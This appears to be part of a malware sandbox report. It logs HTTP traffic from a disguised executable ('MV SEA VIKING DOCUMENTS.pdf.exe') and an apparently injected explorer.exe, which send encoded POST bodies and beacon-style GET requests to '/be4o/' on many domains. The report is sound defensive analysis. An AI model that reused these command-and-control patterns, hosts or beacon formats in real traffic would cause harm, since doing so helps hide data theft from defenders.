Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID    Source IP        Source Port    Destination IP    Destination Port    Process
24            192.168.11.20    49809          185.190.39.52     80                  C:\Windows\explorer.exe

Timestamp    kBytes transferred    Direction    Data
Feb 21, 2022 16:54:16.538887978 CET    9309    OUT    POST /be4o/ HTTP/1.1
Host: www.dreamintelligent.com
Connection: close
Content-Length: 174831
Cache-Control: no-cache
Origin: http://www.dreamintelligent.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.dreamintelligent.com/be4o/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                              Data Ascii: wAa1vVLSVQhTGTvrDBfmFg-4NlU9g4CUFNM91(0UBAA8kQLd0VB9vn6q2ntiR7Iq_EDrGOcI3gLZtEfuxaRMq6W~p(tSIjynOhXHVSFjUPumWAF7o38t_mjsPV1GhrXZJF3G7aJcouw7qjBEnVUZFUFOFJk4OdJuIUP5Z1RN9Ptzx2ohDAOMivM(MuDikqVp05PpkXtjJae5eql61nr9G6KaB7EgOTyLkq1sKANHP(qnsv7UL2e
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.728606939 CET9362OUTData Raw: 30 49 31 53 34 77 56 32 7a 4e 70 7e 58 59 62 58 66 66 54 72 5f 38 6e 69 76 4a 30 56 54 49 57 62 4d 73 4b 5a 7a 48 54 4d 33 7e 30 62 47 31 55 4d 63 44 34 4b 35 50 4a 39 35 62 38 62 7a 44 47 76 6d 65 41 42 48 6a 39 73 44 30 42 62 6e 41 7a 41 78 54
                                                                                                                                                                                                                              Data Ascii: 0I1S4wV2zNp~XYbXffTr_8nivJ0VTIWbMsKZzHTM3~0bG1UMcD4K5PJ95b8bzDGvmeABHj9sD0BbnAzAxTK(cpTUJ9OwwLfJly7xJdTcUsZDDREDT4VkSllpoS1pXm3hXHQ~wCjE0GTI_VIoiGIGI7XEbt1xQ(NO_fNwiZXMYErQAzTq9czldY8(fVYouTUNpT7XjuN3YVqyjIi4RgEu5CyK4F1N7NT2fCCYfbE0_Fdh6v3X3AG
Feb 21, 2022 16:54:17.348095894 CET  9482  IN  HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              X-Powered-By: PHP/7.2.34
                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                              X-Redirect-By: WordPress
                                                                                                                                                                                                                              Location: https://www.dreamintelligent.com/be4o/
                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:54:17 GMT
                                                                                                                                                                                                                              Server: LiteSpeed
                                                                                                                                                                                                                              Vary: User-Agent


Session ID  Source IP      Source Port  Destination IP  Destination Port  Process
25          192.168.11.20  49810        185.190.39.52   80                C:\Windows\explorer.exe

Timestamp  kBytes transferred  Direction  Data
Feb 21, 2022 16:54:16.634835005 CET  9322  OUT  GET /be4o/?h48Hl=3gaGgvCHlfs+sPey4wEISFn1QJRwzcaNyq85jGUXFNKJ+AEleqZoXJJYcNbcoOST9cbz&GXqXh=YZ_XN0 HTTP/1.1
                                                                                                                                                                                                                              Host: www.dreamintelligent.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
Feb 21, 2022 16:54:17.851248026 CET  9483  IN  HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              X-Powered-By: PHP/7.2.34
                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                              X-Redirect-By: WordPress
                                                                                                                                                                                                                              Location: https://www.dreamintelligent.com/be4o/?h48Hl=3gaGgvCHlfs+sPey4wEISFn1QJRwzcaNyq85jGUXFNKJ+AEleqZoXJJYcNbcoOST9cbz&GXqXh=YZ_XN0
                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:54:17 GMT
                                                                                                                                                                                                                              Server: LiteSpeed
                                                                                                                                                                                                                              Vary: User-Agent


Session ID  Source IP      Source Port  Destination IP  Destination Port  Process
26          192.168.11.20  49812        34.102.136.180  80                C:\Windows\explorer.exe

Timestamp  kBytes transferred  Direction  Data
Feb 21, 2022 16:54:22.170118093 CET  9497  OUT  POST /be4o/ HTTP/1.1
                                                                                                                                                                                                                              Host: www.josiemaran-supernatural.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Content-Length: 174831
                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                              Origin: http://www.josiemaran-supernatural.com
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Referer: http://www.josiemaran-supernatural.com/be4o/
                                                                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                              Data Ascii: yuEDrWd3B8L6rMEDW4OG2nSZWvg3PHQ_9X3rIsnituf88YAPhjYz41YS3FxoPDFj(wQ-LURFcDHhi2TWeqttXK3VStu9TM6ZB-PQSPM8hgE09l2C0yjZzBedSMIuGh2FiIfRvKzpAvqCHYMpZp97PT(VoNWTmLwHDS~Iz0UuPFpe(mG3d72NqWHAowC5GsWTzm7o4-AiHEfTt-8Ly0qCVJj_vT83m2fpSwnHlak-PbJDqtW4bG5
Feb 21, 2022 16:54:22.278912067 CET | 9669 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                                                                                                                              Server: openresty
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:54:22 GMT
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Content-Length: 154
                                                                                                                                                                                                                              X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_CpLPvD4XQuVnha6rO1wNCX6rSp91UJvoNJN0meDWFFo5JM5s7CpzF76GDsyLNNL0W4YULbTU4G/1WiDDezugCQ
                                                                                                                                                                                                                              Via: 1.1 google
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
27 | 192.168.11.20 | 49813 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 21, 2022 16:54:22.181205988 CET | 9529 | OUT | GET /be4o/?h48Hl=do8Jf58SEKGGCNGHZbpskk9a9mhTmrx8G+lp6qHzh6DMjzgDqGs60o4ehjqHyuaS4N4w&GXqXh=YZ_XN0 HTTP/1.1
                                                                                                                                                                                                                              Host: www.josiemaran-supernatural.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
Feb 21, 2022 16:54:22.287843943 CET | 9669 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                                                                                              Server: openresty
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:54:22 GMT
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Content-Length: 275
                                                                                                                                                                                                                              ETag: "61ffb800-113"
                                                                                                                                                                                                                              Via: 1.1 google
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
28 | 192.168.11.20 | 49814 | 45.195.115.71 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 21, 2022 16:54:27.471216917 CET | 9674 | OUT | POST /be4o/ HTTP/1.1
                                                                                                                                                                                                                              Host: www.rsxrsh.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Content-Length: 174831
                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                              Origin: http://www.rsxrsh.com
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Referer: http://www.rsxrsh.com/be4o/
                                                                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
29 | 192.168.11.20 | 49815 | 45.195.115.71 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 21, 2022 16:54:27.646806002 CET | 9710 | OUT | GET /be4o/?h48Hl=Tpp8LERQoafeDPvT4B0Z2/EHkXBIuz7bjHlQVU8N2p3tpS82PcmIpc4MoLsyxaBwDc0d&GXqXh=YZ_XN0 HTTP/1.1
                                                                                                                                                                                                                              Host: www.rsxrsh.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
Feb 21, 2022 16:54:28.199902058 CET | 9846 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                              Server: nginx/1.20.1
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:54:28 GMT
                                                                                                                                                                                                                              Content-Type: text/html; charset=gbk
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              X-Powered-By: PHP/5.6.40
                                                                                                                                                                                                                              Location: /404.html
                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.11.20 | 49808 | 142.250.185.161 | 443 | C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
30 | 192.168.11.20 | 49817 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 21, 2022 16:54:33.183643103 CET | 9854 | OUT | POST /be4o/ HTTP/1.1
                                                                                                                                                                                                                              Host: www.noireimpactcollective.net
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Content-Length: 174831
                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                              Origin: http://www.noireimpactcollective.net
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Referer: http://www.noireimpactcollective.net/be4o/
                                                                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
Feb 21, 2022 16:54:33.353749990 CET | 10031 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                                                                                                                              Server: openresty
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:54:33 GMT
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Content-Length: 154
                                                                                                                                                                                                                              X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_CbjudUiBjCW5Ca4At5kMqgpefCGUlUMhFy81qXT6n7567CytrZGaq0zum65/Z+hg0KTAtZmTvVBtpROPYlF2QA
                                                                                                                                                                                                                              Via: 1.1 google
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
31 | 192.168.11.20 | 49818 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 21, 2022 16:54:33.194776058 CET | 9891 | OUT | GET /be4o/?h48Hl=vWcq0X33Y2hBfiL/bHeP0RWtqtuntvM4ehZwLUMPr58K+hEeg2YqRGCwATn/AzHlKLs2&GXqXh=YZ_XN0 HTTP/1.1
                                                                                                                                                                                                                              Host: www.noireimpactcollective.net
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
Feb 21, 2022 16:54:33.300225973 CET | 10030 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                                                                                              Server: openresty
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:54:33 GMT
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Content-Length: 275
                                                                                                                                                                                                                              ETag: "61ffb800-113"
                                                                                                                                                                                                                              Via: 1.1 google
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
32 | 192.168.11.20 | 49827 | 35.214.4.70 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 21, 2022 16:54:43.384748936 CET | 10132 | OUT | POST /be4o/ HTTP/1.1
                                                                                                                                                                                                                              Host: www.ooo-club.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Content-Length: 174831
                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                              Origin: http://www.ooo-club.com
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Referer: http://www.ooo-club.com/be4o/
                                                                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
Feb 21, 2022 16:54:43.409672022 CET | 10140 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:54:43 GMT
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Content-Length: 162
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Location: https://www.ooo-club.com/be4o/
                                                                                                                                                                                                                              Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                                                                                                                                                                              X-HTTPS-Enforce: 1
                                                                                                                                                                                                                              X-Proxy-Cache-Info: DT:1
                                                                                                                                                                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
33 | 192.168.11.20 | 49828 | 35.214.4.70 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 21, 2022 16:54:43.410276890 CET | 10147 | OUT | GET /be4o/?h48Hl=QNRjHLgdDThc6A5oSB9Rp7ktW95Q4+1l/IbqwB8DOvHda+yG2lJr6+bTEkZVhYbPGXKX&GXqXh=YZ_XN0 HTTP/1.1
                                                                                                                                                                                                                              Host: www.ooo-club.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
Feb 21, 2022 16:54:43.435308933 CET | 10148 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:54:43 GMT
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Content-Length: 162
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Location: https://www.ooo-club.com/be4o/?h48Hl=QNRjHLgdDThc6A5oSB9Rp7ktW95Q4+1l/IbqwB8DOvHda+yG2lJr6+bTEkZVhYbPGXKX&GXqXh=YZ_XN0
                                                                                                                                                                                                                              Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                                                                                                                                                                              X-HTTPS-Enforce: 1
                                                                                                                                                                                                                              X-Proxy-Cache-Info: DT:1
                                                                                                                                                                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
34 | 192.168.11.20 | 49831 | 54.154.44.39 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 21, 2022 16:55:02.299629927 CET | 10175 | OUT | POST /be4o/ HTTP/1.1
                                                                                                                                                                                                                              Host: www.mariachinuevozacatecas24-7.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Content-Length: 174831
                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                              Origin: http://www.mariachinuevozacatecas24-7.com
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Referer: http://www.mariachinuevozacatecas24-7.com/be4o/
                                                                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
Feb 21, 2022 16:55:02.335007906 CET | 10188 | IN | HTTP/1.1 302 Moved Temporarily
Server: openresty
Date: Mon, 21 Feb 2022 15:55:02 GMT
Content-Type: text/html
Content-Length: 142
Connection: close
Location: https://www.mariachinuevozacatecas24-7.com/be4o/
Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
35 | 192.168.11.20 | 49832 | 54.154.44.39 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 21, 2022 16:55:02.336623907 CET | 10197 | OUT | GET /be4o/?h48Hl=u3IzMx5ToVDuGGVnzGoQ7VGXCLeqa3ksCgRWKaNdgo4W3sFmKuQ6Eu5/95yvzyZg0zqi&7nx8=7nN0Wh-H7 HTTP/1.1
Host: www.mariachinuevozacatecas24-7.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Feb 21, 2022 16:55:02.372431993 CET | 10198 | IN | HTTP/1.1 302 Moved Temporarily
Server: openresty
Date: Mon, 21 Feb 2022 15:55:02 GMT
Content-Type: text/html
Content-Length: 142
Connection: close
Location: https://www.mariachinuevozacatecas24-7.com/be4o/?h48Hl=u3IzMx5ToVDuGGVnzGoQ7VGXCLeqa3ksCgRWKaNdgo4W3sFmKuQ6Eu5/95yvzyZg0zqi&7nx8=7nN0Wh-H7
Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
36 | 192.168.11.20 | 49833 | 154.214.67.115 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 21, 2022 16:55:13.175852060 CET | 10203 | OUT | POST /be4o/ HTTP/1.1
Host: www.nagradi7.com
Connection: close
Content-Length: 174831
Cache-Control: no-cache
Origin: http://www.nagradi7.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.nagradi7.com/be4o/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                              Data Ascii: RNmFV6XLvB5jmdwAz6OWRWs6rquOJO80XCKcOv_m794LH9sbqhxbGmYbacY9US1hA7bUWSezFF89wkQSKan~2vPGrkMdGFGt_Kwvp~Q29aFszqu1JO50sWaMUPnlZqGU7~iTRRd72avMoq9EzueRQ~As3XIFjN5XSwRX3C6ttor0ZJ3H45Iu2uLoFUPZDNqZ9aVIKu4CyQKH-7aw3cteWzwskVcwOHBLUnbWY3gfgghXtb2fVUx
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.366213083 CET10221OUTData Raw: 63 46 6b 4f 45 7a 36 6e 34 34 78 34 43 77 30 56 58 38 69 6a 58 59 78 37 32 58 72 37 6b 37 57 6e 30 4f 35 64 79 50 79 67 4a 48 45 51 38 77 2d 49 42 43 6e 73 35 75 36 4f 74 62 75 4e 50 44 6b 30 34 63 31 62 4c 69 61 6f 38 76 56 75 52 78 4d 53 71 4c
                                                                                                                                                                                                                              Data Ascii: cFkOEz6n44x4Cw0VX8ijXYx72Xr7k7Wn0O5dyPygJHEQ8w-IBCns5u6OtbuNPDk04c1bLiao8vVuRxMSqLToaRpsusqijHPJyK49QeBLH9BNYy-QJpkPtxVtEQK9ZheztXxwlMEk2pMwpG0OMAOJcp9ya~ZKSC3htWwzPTPGMUr(lNUuivklU0KwTsr6V6LRDOPAQzr9-y4NGt2pZjufeu5kPcABCTTPR(vqPbrKn~fvwSSdll3
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.366391897 CET10226OUTData Raw: 39 6e 33 35 33 52 35 4b 6e 4d 30 4f 43 69 62 53 30 54 6d 71 68 30 4f 44 67 58 4d 61 54 6e 50 37 78 4b 53 6e 6f 57 52 4c 30 57 58 31 35 6a 49 4a 53 28 56 37 54 35 31 47 31 31 31 53 42 35 48 33 67 53 36 78 51 47 37 51 55 71 76 75 79 64 63 54 5a 64
                                                                                                                                                                                                                              Data Ascii: 9n353R5KnM0OCibS0Tmqh0ODgXMaTnP7xKSnoWRL0WX15jIJS(V7T51G111SB5H3gS6xQG7QUqvuydcTZdCaYRe8NeRBbvMTNbpK-vGP-5s3NCYo72yDTQQiRJ2pRxzDQt8bbdjqQn5z8STasGVVDk5wYg7JaQbMqADP35NECpjmrDhO9zFkpiqHo5g~HaPquoBoyr7N92Kw8fLNHoPHmlZJT(nQYJugTWYBXZBacgK7DRcy8ow
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.366647959 CET10228OUTData Raw: 55 79 57 28 56 4a 71 75 4b 49 59 78 79 71 6d 52 42 5a 76 51 65 4a 6a 61 6a 32 59 35 5a 53 33 4a 79 5a 4d 77 41 62 4e 77 6c 4d 31 5a 63 38 79 79 54 73 46 78 51 39 44 53 4b 4e 35 35 46 47 78 6a 6a 51 33 6f 4f 33 78 68 38 61 73 70 39 6b 66 44 63 62
                                                                                                                                                                                                                              Data Ascii: UyW(VJquKIYxyqmRBZvQeJjaj2Y5ZS3JyZMwAbNwlM1Zc8yyTsFxQ9DSKN55FGxjjQ3oO3xh8asp9kfDcb-p_jSyWtr4GmgxVSbN6bTn0N7mxk5N7WcoB~KuuiJ5-s79d34pSHbjPc03grFcawq5lao3e2fgC6dyq3ZXx~KASjtSCrwXP2rogHO6UIUVJgU(SIXEUP6JVNenrJTv5rEvSj69Por8mUnT-w0Gti59aOl6gJdalxY
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.366827965 CET10229OUTData Raw: 6e 68 37 36 4f 28 59 67 39 52 52 36 31 49 5a 4b 78 71 76 51 75 35 4e 39 50 54 62 72 6f 4d 5a 7e 58 77 2d 49 6b 73 78 78 4e 45 56 79 75 6b 53 31 54 66 4e 73 36 6f 6a 75 69 69 4b 6b 66 28 33 46 54 66 68 31 37 55 43 4f 39 43 44 34 6c 6f 6d 6a 72 6f
                                                                                                                                                                                                                              Data Ascii: nh76O(Yg9RR61IZKxqvQu5N9PTbroMZ~Xw-IksxxNEVyukS1TfNs6ojuiiKkf(3FTfh17UCO9CD4lomjro9PdeFa2GTS_Ns4_gog_b0F-lYXpdJRZrq(m2slEXQVDeF3rTn0FbwLx(cTcfidhrOJrWkFTjVdvfuufKzCkgbJ6UQ6KPIZ3h94v2wwhjqFtc2v2EcZhcaecuAdmxC5s8ESguGelpwyECcO1WMf5l0KTR98xv1PL(r
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.556849003 CET10235OUTData Raw: 55 61 54 32 38 6b 55 4a 47 34 6e 74 52 70 63 6e 42 44 72 34 59 4c 67 6d 61 45 34 78 65 4c 51 6b 4c 65 30 66 46 6c 30 58 45 4e 74 49 45 64 2d 31 37 7a 30 55 5f 75 71 6e 30 41 72 42 5a 64 78 7e 51 49 55 4e 4b 76 6c 64 76 71 37 37 75 73 7a 37 45 51
